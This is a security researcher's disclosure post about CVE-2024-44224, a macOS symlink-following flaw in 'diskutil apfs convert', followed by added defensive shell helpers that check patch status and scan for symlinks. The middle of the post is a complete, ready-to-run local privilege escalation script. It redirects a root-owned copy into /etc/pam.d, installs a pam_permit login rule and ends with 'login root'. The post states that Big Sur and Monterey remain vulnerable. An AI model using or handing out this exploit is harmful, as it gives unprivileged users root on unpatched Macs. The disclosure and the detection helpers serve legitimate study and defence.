Before actually converting from HFS+, diskutil apfs convert first copies the legacy boot files into a "staging" folder passed with -prebootSource. The copying is done by storagekitd (as root), and it follows symlinks, which yields an arbitrary file write as root. That is easily turned into privilege escalation.
After reporting the bug in September 2024, I received an Apple Security Bounty, and it was fixed in macOS 13.7.2, macOS 14.7.2, and macOS 15.2:
Impact: A malicious app may be able to gain root privileges
Description: A permissions issue was addressed with additional restrictions.
CVE-2024-44224: Amy (@asentientbot)
Big Sur and Monterey are still vulnerable.
Once again, emma (916253) and ASentientHedgehog helped test.
They're also really cool in general, please go follow them.
The following shell script will log you in as root on affected versions.
wholeDevice=$(hdiutil attach -nomount -plist ram://10000000 | plutil -extract system-entities.0.dev-entry raw -)
mainName=$(mktemp -u evilXXXXX)
bootName=$(mktemp -u bootXXXXX)
diskutil partitiondisk $wholeDevice gpt jhfs+ $mainName 1g %Apple_Boot% %noformat% r
newfs_hfs -v $bootName ${wholeDevice}s3
diskutil mount ${wholeDevice}s3
bugInput=/Volumes/$bootName/com.apple.boot.R/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations
bugOutput=/Volumes/$mainName/staging/System/Library/Caches/com.apple.corestorage/EFILoginLocalizations
mkdir -p $bugInput
mkdir -p $(dirname $bugOutput)
echo 'auth sufficient pam_permit.so
account sufficient pam_permit.so
session sufficient pam_permit.so' > $bugInput/login
ln -s /etc/pam.d $bugOutput
diskutil apfs convert $mainName -prebootSource /Volumes/$mainName/staging
login root
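Two defensive helpers, added here and not part of the original post: a POSIX sh check that classifies a macOS productVersion against the fixed releases listed above (13.7.2, 14.7.2, 15.2, with Big Sur and Monterey affected), and a scan that refuses a staging tree containing symlinks, the condition a root-owned copy should never tolerate. Assumptions: releases newer than 15.2 are patched, and releases older than Big Sur are reported as unknown because the advisory does not cover them.

```shell
#!/bin/sh
# Added defensive helpers for CVE-2024-44224 (not from the original post).
# Fixed releases per the advisory quoted above: 13.7.2, 14.7.2, 15.2.
# Assumptions: anything newer than 15.2 is patched; anything older than
# Big Sur (11.x) is outside the advisory and reported as unknown.

# cve_2024_44224_patched VERSION -> exit 0 patched, 1 affected, 2 unknown
cve_2024_44224_patched() {
    ver=$1
    major=${ver%%.*}
    rest=${ver#"$major"}; rest=${rest#.}
    minor=${rest%%.*}
    rest=${rest#"$minor"}; rest=${rest#.}
    patch=${rest%%.*}
    [ -n "$minor" ] || minor=0
    [ -n "$patch" ] || patch=0
    case $major in
        11|12) return 1 ;;                  # Big Sur, Monterey: no fix shipped
        13|14) fix_minor=7; fix_patch=2 ;;  # fixed in 13.7.2 / 14.7.2
        15)    fix_minor=2; fix_patch=0 ;;  # fixed in 15.2
        *)     [ "$major" -gt 15 ] && return 0; return 2 ;;
    esac
    [ "$minor" -gt "$fix_minor" ] && return 0
    [ "$minor" -lt "$fix_minor" ] && return 1
    [ "$patch" -ge "$fix_patch" ] && return 0
    return 1
}

# cve_2024_44224_status VERSION -> prints patched | affected | unknown
cve_2024_44224_status() {
    cve_2024_44224_patched "$1" && { echo patched; return; }
    [ $? -eq 1 ] && echo affected || echo unknown
}

# staging_tree_is_clean DIR -> exit 0 if no symlink exists anywhere in DIR.
# A privileged copy that follows symlinks is exactly the primitive this bug
# hands over, so a staging tree with any symlink in it should be rejected.
staging_tree_is_clean() {
    [ -z "$(find "$1" -type l -print | head -n 1)" ]
}

# Report on the running host (only meaningful on macOS).
if [ "$(uname)" = Darwin ]; then
    running=$(sw_vers -productVersion)
    echo "macOS $running: $(cve_2024_44224_status "$running")"
fi
```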